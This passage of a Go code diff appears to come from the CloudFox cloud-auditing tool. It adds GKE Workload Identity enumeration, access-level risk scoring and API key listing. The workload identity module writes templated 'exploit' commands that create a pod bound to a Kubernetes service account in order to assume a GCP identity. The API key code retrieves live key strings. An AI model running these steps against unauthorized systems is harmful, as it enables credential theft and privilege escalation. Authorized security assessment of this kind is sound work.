+ ProjectClusters map[string][]ClusterWorkloadIdentity // projectID -> clusters + ProjectBindings map[string][]WorkloadIdentityBinding // projectID -> bindings + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type WorkloadIdentityOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o WorkloadIdentityOutput) TableFiles() []internal.TableFile { return o.Table } +func (o WorkloadIdentityOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPWorkloadIdentityCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + if err != nil { + return + } + + module := &WorkloadIdentityModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectClusters: make(map[string][]ClusterWorkloadIdentity), + ProjectBindings: make(map[string][]WorkloadIdentityBinding), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *WorkloadIdentityModule) Execute(ctx context.Context, logger internal.Logger) { + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper cache for attack path analysis", globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, m.processProject) + + allClusters := m.getAllClusters() + allBindings := m.getAllBindings() + + if len(allClusters) == 0 { + logger.InfoM("No GKE clusters found", globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + return + } + + wiEnabled := 0 + for _, c := range allClusters { + if c.WorkloadPoolEnabled { + wiEnabled++ + } + } + logger.SuccessM(fmt.Sprintf("Found %d GKE cluster(s) (%d with Workload Identity), %d K8s->GCP binding(s)", + len(allClusters), wiEnabled, len(allBindings)), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllClusters returns all clusters from all projects +func (m *WorkloadIdentityModule) getAllClusters() []ClusterWorkloadIdentity { + var all []ClusterWorkloadIdentity + for _, clusters := range m.ProjectClusters { + all = append(all, clusters...) + } + return all +} + +// getAllBindings returns all bindings from all projects +func (m *WorkloadIdentityModule) getAllBindings() []WorkloadIdentityBinding { + var all []WorkloadIdentityBinding + for _, bindings := range m.ProjectBindings { + all = append(all, bindings...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *WorkloadIdentityModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating GKE Workload Identity in project: %s", projectID), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } + + gkeSvc := gkeservice.New() + clusters, _, err := gkeSvc.Clusters(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate GKE clusters in project %s", projectID)) + return + } + + var clusterInfos []ClusterWorkloadIdentity + var bindings []WorkloadIdentityBinding + + for _, cluster := range clusters { + cwi := ClusterWorkloadIdentity{ + ProjectID: projectID, + ClusterName: cluster.Name, + Location: cluster.Location, + TotalNodePools: cluster.NodePoolCount, + } + + if cluster.WorkloadIdentity != "" { + cwi.WorkloadPoolEnabled = true + cwi.WorkloadPool = cluster.WorkloadIdentity + } + + if cwi.WorkloadPoolEnabled { + cwi.NodePoolsWithWI = cwi.TotalNodePools + } + + clusterInfos = append(clusterInfos, cwi) + + // If Workload Identity is enabled, look for bindings + if cwi.WorkloadPoolEnabled { + clusterBindings := m.findWorkloadIdentityBindings(ctx, projectID, cluster.Name, cluster.Location, cwi.WorkloadPool, logger) + bindings = append(bindings, clusterBindings...) + } + } + + m.mu.Lock() + m.ProjectClusters[projectID] = clusterInfos + m.ProjectBindings[projectID] = bindings + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["workloadidentity-commands"] = &internal.LootFile{ + Name: "workloadidentity-commands", + Contents: "# Workload Identity Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, cwi := range clusterInfos { + m.addClusterToLoot(projectID, cwi) + } + for _, binding := range bindings { + m.addBindingToLoot(projectID, binding) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d GKE cluster(s), %d K8s binding(s) in project %s", + len(clusterInfos), len(bindings), projectID), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } +} + +// findWorkloadIdentityBindings finds all IAM bindings that grant workloadIdentityUser role +// by querying the IAM policy ON each service account (resource-level, not project-level) +func (m *WorkloadIdentityModule) findWorkloadIdentityBindings(ctx context.Context, projectID, clusterName, location, workloadPool string, logger internal.Logger) []WorkloadIdentityBinding { + var bindings []WorkloadIdentityBinding + + iamSvc := IAMService.New() + serviceAccounts, err := iamSvc.ServiceAccountsBasic(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + fmt.Sprintf("Could not list service accounts in project %s", projectID)) + return bindings + } + + // Get an IAM service client for SA-level policy queries + iamService, err := iam.NewService(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + "Could not create IAM service client") + return bindings + } + + for _, sa := range serviceAccounts { + // Get the IAM policy ON the service account resource (not project-level) + saResource := fmt.Sprintf("projects/%s/serviceAccounts/%s", projectID, sa.Email) + policy, err := iamService.Projects.ServiceAccounts.GetIamPolicy(saResource).Context(ctx).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + if binding.Role == "roles/iam.workloadIdentityUser" { + for _, member := range binding.Members { + if strings.HasPrefix(member, "serviceAccount:") && strings.Contains(member, ".svc.id.goog") { + ns, ksa := parseWorkloadIdentityMember(member) + if ns != "" && ksa != "" { + wib := WorkloadIdentityBinding{ + ProjectID: projectID, + ClusterName: clusterName, + ClusterLocation: location, + WorkloadPool: workloadPool, + KubernetesNS: ns, + KubernetesSA: ksa, + GCPServiceAccount: sa.Email, + GCPSARoles: sa.Roles, + BindingType: "workloadIdentityUser", + } + wib.IsHighPrivilege = isHighPrivilegeServiceAccount(sa) + bindings = append(bindings, wib) + } + } + } + } + } + } + + return bindings +} + +// parseWorkloadIdentityMember parses a workload identity member string +// Format: serviceAccount:[PROJECT_ID].svc.id.goog[NAMESPACE/KSA_NAME] +func parseWorkloadIdentityMember(member string) (namespace, serviceAccount string) { + member = strings.TrimPrefix(member, "serviceAccount:") + + bracketStart := strings.Index(member, "[") + bracketEnd := strings.Index(member, "]") + + if bracketStart == -1 || bracketEnd == -1 || bracketEnd <= bracketStart { + return "", "" + } + + nsAndSA := member[bracketStart+1 : bracketEnd] + parts := strings.Split(nsAndSA, "/") + if len(parts) == 2 { + return parts[0], parts[1] + } + + return "", "" +} + +// isHighPrivilegeServiceAccount checks if a service account has high-privilege roles +func isHighPrivilegeServiceAccount(sa IAMService.ServiceAccountInfo) bool { + highPrivRoles := map[string]bool{ + "roles/owner": true, + "roles/editor": true, + "roles/iam.serviceAccountAdmin": true, + "roles/iam.serviceAccountKeyAdmin": true, + "roles/iam.serviceAccountTokenCreator": true, + "roles/resourcemanager.projectIamAdmin": true, + "roles/compute.admin": true, + "roles/container.admin": true, + "roles/secretmanager.admin": true, + "roles/storage.admin": true, + } + + for _, role := range sa.Roles { + if highPrivRoles[role] { + return true + } + } + return false +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *WorkloadIdentityModule) addClusterToLoot(projectID string, cwi ClusterWorkloadIdentity) { + lootFile := m.LootMap[projectID]["workloadidentity-commands"] + if lootFile == nil { + return + } + if cwi.WorkloadPoolEnabled { + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# GKE CLUSTER: %s\n"+ + "# =============================================================================\n"+ + "# Location: %s\n"+ + "# Workload Pool: %s\n"+ + "# Node Pools with WI: %d/%d\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Get cluster credentials:\n"+ + "gcloud container clusters get-credentials %s --zone=%s --project=%s\n\n", + cwi.ClusterName, + cwi.Location, + cwi.WorkloadPool, + cwi.NodePoolsWithWI, + cwi.TotalNodePools, + cwi.ClusterName, + cwi.Location, + cwi.ProjectID, + ) + } +} + +func (m *WorkloadIdentityModule) addBindingToLoot(projectID string, binding WorkloadIdentityBinding) { + lootFile := m.LootMap[projectID]["workloadidentity-commands"] + if lootFile == nil { + return + } + highPriv := "" + if binding.IsHighPrivilege { + highPriv = " [HIGH PRIVILEGE]" + } + + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# K8s SA BINDING: %s/%s -> %s%s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Cluster: %s (%s)\n", + binding.KubernetesNS, + binding.KubernetesSA, + binding.GCPServiceAccount, + highPriv, + binding.ClusterName, + binding.ClusterLocation, + ) + + if binding.IsHighPrivilege && len(binding.GCPSARoles) > 0 { + lootFile.Contents += fmt.Sprintf( + "# GCP SA Roles: %s\n", + strings.Join(binding.GCPSARoles, ", "), + ) + } + + lootFile.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + lootFile.Contents += fmt.Sprintf( + "# To exploit, create pod with this service account:\n"+ + "# kubectl run exploit-pod --image=google/cloud-sdk:slim --serviceaccount=%s -n %s -- sleep infinity\n"+ + "# kubectl exec -it exploit-pod -n %s -- gcloud auth list\n\n", + binding.KubernetesSA, + binding.KubernetesNS, + binding.KubernetesNS, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *WorkloadIdentityModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectClusters { + tables := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = WorkloadIdentityOutput{Table: tables, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *WorkloadIdentityModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allClusters := m.getAllClusters() + allBindings := m.getAllBindings() + + tables := m.buildTables(allClusters, allBindings) + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := WorkloadIdentityOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + "Could not write output") + } +} + +// buildTablesForProject builds tables for a specific project +func (m *WorkloadIdentityModule) buildTablesForProject(projectID string) []internal.TableFile { + clusters := m.ProjectClusters[projectID] + bindings := m.ProjectBindings[projectID] + return m.buildTables(clusters, bindings) +} + +// buildTables builds all tables from the given data +func (m *WorkloadIdentityModule) buildTables( + clusters []ClusterWorkloadIdentity, + bindings []WorkloadIdentityBinding, +) []internal.TableFile { + var tables []internal.TableFile + + // Clusters table + clustersHeader := []string{ + "Project", + "Cluster", + "Location", + "Cluster WI Enabled", + "Workload Pool", + "Node Pools WI Enabled", + } + + var clustersBody [][]string + for _, cwi := range clusters { + wiEnabled := "No" + if cwi.WorkloadPoolEnabled { + wiEnabled = "Yes" + } + workloadPool := "-" + if cwi.WorkloadPool != "" { + workloadPool = cwi.WorkloadPool + } + + nodePoolsWI := fmt.Sprintf("%d of %d", cwi.NodePoolsWithWI, cwi.TotalNodePools) + + clustersBody = append(clustersBody, []string{ + m.GetProjectName(cwi.ProjectID), + cwi.ClusterName, + cwi.Location, + wiEnabled, + workloadPool, + nodePoolsWI, + }) + } + + if len(clustersBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "workload-identity-clusters", + Header: clustersHeader, + Body: clustersBody, + }) + } + + // Bindings table + bindingsHeader := []string{ + "Project", + "Cluster", + "K8s Namespace", + "K8s Service Account", + "GCP Service Account", + "High Privilege SA", + "SA Attack Paths", + } + + var bindingsBody [][]string + for _, binding := range bindings { + highPriv := "No" + if binding.IsHighPrivilege { + highPriv = "Yes" + } + + attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, binding.GCPServiceAccount) + + bindingsBody = append(bindingsBody, []string{ + m.GetProjectName(binding.ProjectID), + binding.ClusterName, + binding.KubernetesNS, + binding.KubernetesSA, + binding.GCPServiceAccount, + highPriv, + attackPaths, + }) + } + + if len(bindingsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "workload-identity-bindings", + Header: bindingsHeader, + Body: bindingsBody, + }) + } + + return tables +} diff --git a/gcp/services/accessPolicyService/accessPolicyService.go b/gcp/services/accessPolicyService/accessPolicyService.go new file mode 100644 index 00000000..68e56511 --- /dev/null +++ b/gcp/services/accessPolicyService/accessPolicyService.go @@ -0,0 +1,279 @@ +package accesspolicyservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + accesscontextmanager "google.golang.org/api/accesscontextmanager/v1" +) + +type AccessPolicyService struct { + session *gcpinternal.SafeSession +} + +func New() *AccessPolicyService { + return &AccessPolicyService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *AccessPolicyService { + return &AccessPolicyService{session: session} +} + +// getService returns an Access Context Manager service using cached session if available +func (s *AccessPolicyService) getService(ctx context.Context) (*accesscontextmanager.Service, error) { + if s.session != nil { + return sdk.CachedGetAccessContextManagerService(ctx, s.session) + } + return accesscontextmanager.NewService(ctx) +} + +// AccessLevelInfo represents an access level (conditional access policy) +type AccessLevelInfo struct { + Name string `json:"name"` + Title string `json:"title"` + Description string `json:"description"` + PolicyName string `json:"policyName"` + + // Basic level conditions + CombiningFunction string `json:"combiningFunction"` // AND or OR + Conditions []ConditionInfo `json:"conditions"` + + // Custom level + HasCustomLevel bool `json:"hasCustomLevel"` + CustomExpression string `json:"customExpression"` + + // Analysis + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ConditionInfo represents a condition in an access level +type ConditionInfo struct { + IPSubnetworks []string `json:"ipSubnetworks"` + DevicePolicy *DevicePolicyInfo `json:"devicePolicy"` + RequiredAccessLevels []string `json:"requiredAccessLevels"` + Negate bool `json:"negate"` + Members []string `json:"members"` + Regions []string `json:"regions"` +} + +// DevicePolicyInfo represents device policy requirements +type DevicePolicyInfo struct { + RequireScreenLock bool `json:"requireScreenLock"` + RequireAdminApproval bool `json:"requireAdminApproval"` + RequireCorpOwned bool `json:"requireCorpOwned"` + AllowedEncryption []string `json:"allowedEncryptionStatuses"` + AllowedDeviceMgmt []string `json:"allowedDeviceManagementLevels"` + OSConstraints []string `json:"osConstraints"` +} + +// GCIPSettingsInfo represents Google Cloud Identity Platform settings +type GCIPSettingsInfo struct { + TenantIDs []string `json:"tenantIds"` + LoginPageURI string `json:"loginPageUri"` +} + +// ListAccessLevels retrieves all access levels for an organization's policy +func (s *AccessPolicyService) ListAccessLevels(orgID string) ([]AccessLevelInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + var allLevels []AccessLevelInfo + + // First, get access policies for the org + parent := fmt.Sprintf("organizations/%s", orgID) + policiesReq := service.AccessPolicies.List().Parent(parent) + err = policiesReq.Pages(ctx, func(page *accesscontextmanager.ListAccessPoliciesResponse) error { + for _, policy := range page.AccessPolicies { + policyName := extractPolicyName(policy.Name) + + // Get access levels for this policy + levelsParent := fmt.Sprintf("accessPolicies/%s", policyName) + levelsReq := service.AccessPolicies.AccessLevels.List(levelsParent) + levelsReq.Pages(ctx, func(levelsPage *accesscontextmanager.ListAccessLevelsResponse) error { + for _, level := range levelsPage.AccessLevels { + info := s.parseAccessLevel(level, policyName) + allLevels = append(allLevels, info) + } + return nil + }) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + return allLevels, nil +} + +// ListAccessLevelsForPolicy retrieves access levels for a specific policy +func (s *AccessPolicyService) ListAccessLevelsForPolicy(policyName string) ([]AccessLevelInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + var levels []AccessLevelInfo + + parent := fmt.Sprintf("accessPolicies/%s", policyName) + req := service.AccessPolicies.AccessLevels.List(parent) + err = req.Pages(ctx, func(page *accesscontextmanager.ListAccessLevelsResponse) error { + for _, level := range page.AccessLevels { + info := s.parseAccessLevel(level, policyName) + levels = append(levels, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + return levels, nil +} + +func (s *AccessPolicyService) parseAccessLevel(level *accesscontextmanager.AccessLevel, policyName string) AccessLevelInfo { + info := AccessLevelInfo{ + Name: extractLevelName(level.Name), + Title: level.Title, + Description: level.Description, + PolicyName: policyName, + RiskReasons: []string{}, + } + + // Parse basic level + if level.Basic != nil { + info.CombiningFunction = level.Basic.CombiningFunction + + for _, condition := range level.Basic.Conditions { + condInfo := ConditionInfo{ + IPSubnetworks: condition.IpSubnetworks, + Negate: condition.Negate, + Members: condition.Members, + Regions: condition.Regions, + } + + for _, reqLevel := range condition.RequiredAccessLevels { + condInfo.RequiredAccessLevels = append(condInfo.RequiredAccessLevels, extractLevelName(reqLevel)) + } + + // Parse device policy + if condition.DevicePolicy != nil { + dp := condition.DevicePolicy + condInfo.DevicePolicy = &DevicePolicyInfo{ + RequireScreenLock: dp.RequireScreenlock, + RequireAdminApproval: dp.RequireAdminApproval, + RequireCorpOwned: dp.RequireCorpOwned, + AllowedEncryption: dp.AllowedEncryptionStatuses, + AllowedDeviceMgmt: dp.AllowedDeviceManagementLevels, + } + + for _, os := range dp.OsConstraints { + condInfo.DevicePolicy.OSConstraints = append(condInfo.DevicePolicy.OSConstraints, + fmt.Sprintf("%s:%s", os.OsType, os.MinimumVersion)) + } + } + + info.Conditions = append(info.Conditions, condInfo) + } + } + + // Parse custom level + if level.Custom != nil && level.Custom.Expr != nil { + info.HasCustomLevel = true + info.CustomExpression = level.Custom.Expr.Expression + } + + info.RiskLevel, info.RiskReasons = s.analyzeAccessLevelRisk(info) + + return info +} + +func (s *AccessPolicyService) analyzeAccessLevelRisk(level AccessLevelInfo) (string, []string) { + var reasons []string + score := 0 + + for _, condition := range level.Conditions { + // Check for overly broad IP ranges + for _, ip := range condition.IPSubnetworks { + if ip == "0.0.0.0/0" || ip == "::/0" { + reasons = append(reasons, "Access level allows all IP addresses (0.0.0.0/0)") + score += 3 + break + } + } + + // Check for allUsers or allAuthenticatedUsers + for _, member := range condition.Members { + if member == "allUsers" { + reasons = append(reasons, "Access level includes allUsers") + score += 3 + } else if member == "allAuthenticatedUsers" { + reasons = append(reasons, "Access level includes allAuthenticatedUsers") + score += 2 + } + } + + // No device policy requirements + if condition.DevicePolicy == nil { + reasons = append(reasons, "No device policy requirements") + score += 1 + } else { + // Weak device policy + if !condition.DevicePolicy.RequireScreenLock { + reasons = append(reasons, "Does not require screen lock") + score += 1 + } + if !condition.DevicePolicy.RequireCorpOwned { + reasons = append(reasons, "Does not require corporate-owned device") + score += 1 + } + } + } + + // No conditions at all + if len(level.Conditions) == 0 && !level.HasCustomLevel { + reasons = append(reasons, "Access level has no conditions defined") + score += 2 + } + + // OR combining function is more permissive + if level.CombiningFunction == "OR" && len(level.Conditions) > 1 { + reasons = append(reasons, "Uses OR combining function (any condition grants access)") + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func extractPolicyName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLevelName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/apikeysService/apikeysService.go b/gcp/services/apikeysService/apikeysService.go new file mode 100644 index 00000000..1353e536 --- /dev/null +++ b/gcp/services/apikeysService/apikeysService.go @@ -0,0 +1,299 @@ +package apikeysservice + +import ( + "context" + "fmt" + "strings" + "time" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + apikeys "google.golang.org/api/apikeys/v2" +) + +type APIKeysService struct { + session *gcpinternal.SafeSession +} + +// New creates a new APIKeysService +func New() *APIKeysService { + return &APIKeysService{} +} + +// NewWithSession creates an APIKeysService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *APIKeysService { + return &APIKeysService{session: session} +} + +// getService returns an API Keys service client using cached session if available +func (s *APIKeysService) getService(ctx context.Context) (*apikeys.Service, error) { + if s.session != nil { + return sdk.CachedGetAPIKeysService(ctx, s.session) + } + return apikeys.NewService(ctx) +} + +// APIKeyInfo represents information about an API key +type APIKeyInfo struct { + Name string `json:"name"` // Full resource name + UID string `json:"uid"` // Unique identifier + DisplayName string `json:"displayName"` // User-friendly name + KeyString string `json:"keyString"` // The actual key value (if accessible) + ProjectID string `json:"projectId"` + CreateTime time.Time `json:"createTime"` + UpdateTime time.Time `json:"updateTime"` + DeleteTime time.Time `json:"deleteTime"` + Annotations map[string]string `json:"annotations"` + + // Restrictions + HasRestrictions bool `json:"hasRestrictions"` + AllowedAPIs []string `json:"allowedApis"` // API targets + AllowedReferers []string `json:"allowedReferers"` // HTTP referer restrictions + AllowedIPs []string `json:"allowedIps"` // IP restrictions + AllowedAndroidApps []string `json:"allowedAndroidApps"` // Android app restrictions + AllowedIOSApps []string `json:"allowedIosApps"` // iOS app restrictions + RestrictionType string `json:"restrictionType"` // "browser", "server", "android", "ios", "none" + + // Security Analysis + IsUnrestricted bool `json:"isUnrestricted"` // No restrictions at all + RiskLevel string `json:"riskLevel"` // HIGH, MEDIUM, LOW + RiskReasons []string `json:"riskReasons"` +} + +// ListAPIKeys retrieves all API keys in a project +func (s *APIKeysService) ListAPIKeys(projectID string) ([]APIKeyInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + var keys []APIKeyInfo + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + req := service.Projects.Locations.Keys.List(parent) + err = req.Pages(ctx, func(page *apikeys.V2ListKeysResponse) error { + for _, key := range page.Keys { + keyInfo := s.parseAPIKey(key, projectID) + keys = append(keys, keyInfo) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + return keys, nil +} + +// GetAPIKey retrieves a single API key with its key string +func (s *APIKeysService) GetAPIKey(keyName string) (*APIKeyInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + key, err := service.Projects.Locations.Keys.Get(keyName).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + // Extract project ID from key name + // Format: projects/{project}/locations/global/keys/{key} + parts := strings.Split(keyName, "/") + projectID := "" + if len(parts) >= 2 { + projectID = parts[1] + } + + keyInfo := s.parseAPIKey(key, projectID) + return &keyInfo, nil +} + +// GetKeyString retrieves the key string value for an API key +func (s *APIKeysService) GetKeyString(keyName string) (string, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return "", gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + resp, err := service.Projects.Locations.Keys.GetKeyString(keyName).Context(ctx).Do() + if err != nil { + return "", gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + } + + return resp.KeyString, nil +} + +// parseAPIKey converts an API key response to APIKeyInfo +func (s *APIKeysService) parseAPIKey(key *apikeys.V2Key, projectID string) APIKeyInfo { + info := APIKeyInfo{ + Name: key.Name, + UID: key.Uid, + DisplayName: key.DisplayName, + ProjectID: projectID, + Annotations: key.Annotations, + RiskReasons: []string{}, + } + + // Parse times + if key.CreateTime != "" { + if t, err := time.Parse(time.RFC3339, key.CreateTime); err == nil { + info.CreateTime = t + } + } + if key.UpdateTime != "" { + if t, err := time.Parse(time.RFC3339, key.UpdateTime); err == nil { + info.UpdateTime = t + } + } + if key.DeleteTime != "" { + if t, err := time.Parse(time.RFC3339, key.DeleteTime); err == nil { + info.DeleteTime = t + } + } + + // Parse restrictions + if key.Restrictions != nil { + info.HasRestrictions = true + + // API restrictions + if key.Restrictions.ApiTargets != nil { + for _, target := range key.Restrictions.ApiTargets { + info.AllowedAPIs = append(info.AllowedAPIs, target.Service) + } + } + + // Browser restrictions (HTTP referers) + if key.Restrictions.BrowserKeyRestrictions != nil { + info.RestrictionType = "browser" + info.AllowedReferers = key.Restrictions.BrowserKeyRestrictions.AllowedReferrers + } + + // Server restrictions (IPs) + if key.Restrictions.ServerKeyRestrictions != nil { + info.RestrictionType = "server" + info.AllowedIPs = key.Restrictions.ServerKeyRestrictions.AllowedIps + } + + // Android restrictions + if key.Restrictions.AndroidKeyRestrictions != nil { + info.RestrictionType = "android" + for _, app := range key.Restrictions.AndroidKeyRestrictions.AllowedApplications { + info.AllowedAndroidApps = append(info.AllowedAndroidApps, + fmt.Sprintf("%s:%s", app.PackageName, app.Sha1Fingerprint)) + } + } + + // iOS restrictions + if key.Restrictions.IosKeyRestrictions != nil { + info.RestrictionType = "ios" + info.AllowedIOSApps = key.Restrictions.IosKeyRestrictions.AllowedBundleIds + } + + // Check if truly restricted + if len(info.AllowedAPIs) == 0 && + len(info.AllowedReferers) == 0 && + len(info.AllowedIPs) == 0 && + len(info.AllowedAndroidApps) == 0 && + len(info.AllowedIOSApps) == 0 { + info.HasRestrictions = false + info.IsUnrestricted = true + } + } else { + info.IsUnrestricted = true + info.RestrictionType = "none" + } + + // Security analysis + info.RiskLevel, info.RiskReasons = s.analyzeAPIKeyRisk(info) + + return info +} + +// analyzeAPIKeyRisk determines the risk level of an API key +func (s *APIKeysService) analyzeAPIKeyRisk(key APIKeyInfo) (string, []string) { + var reasons []string + score := 0 + + // Unrestricted keys are high risk + if key.IsUnrestricted { + reasons = append(reasons, "No restrictions applied - key can be used from anywhere") + score += 4 + } + + // No API restrictions + if len(key.AllowedAPIs) == 0 && !key.IsUnrestricted { + reasons = append(reasons, "No API restrictions - key can access all enabled APIs") + score += 2 + } + + // Overly permissive API access + for _, api := range key.AllowedAPIs { + if strings.Contains(api, "admin") || strings.Contains(api, "iam") { + reasons = append(reasons, fmt.Sprintf("Has access to sensitive API: %s", api)) + score += 2 + } + } + + // Wildcard in referers + for _, referer := range key.AllowedReferers { + if referer == "*" || referer == "*.com" { + reasons = append(reasons, fmt.Sprintf("Overly permissive referer: %s", referer)) + score += 2 + } + } + + // 0.0.0.0/0 in IPs + for _, ip := range key.AllowedIPs { + if ip == "0.0.0.0/0" || ip == "::/0" { + reasons = append(reasons, "Allows access from any IP (0.0.0.0/0)") + score += 3 + } + } + + // Old keys + if !key.CreateTime.IsZero() { + age := time.Since(key.CreateTime) + if age > 365*24*time.Hour { + reasons = append(reasons, fmt.Sprintf("Key is older than 1 year (%d days)", int(age.Hours()/24))) + score += 1 + } + } + + // Determine risk level + if score >= 4 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + + return "INFO", reasons +} + +// ListAPIKeysWithKeyStrings retrieves all API keys with their key strings +func (s *APIKeysService) ListAPIKeysWithKeyStrings(projectID string) ([]APIKeyInfo, error) { + keys, err := s.ListAPIKeys(projectID) + if err != nil { + return nil, err + } + + // Try to get key strings for each key + for i := range keys { + keyString, err := s.GetKeyString(keys[i].Name) + if err != nil { + // 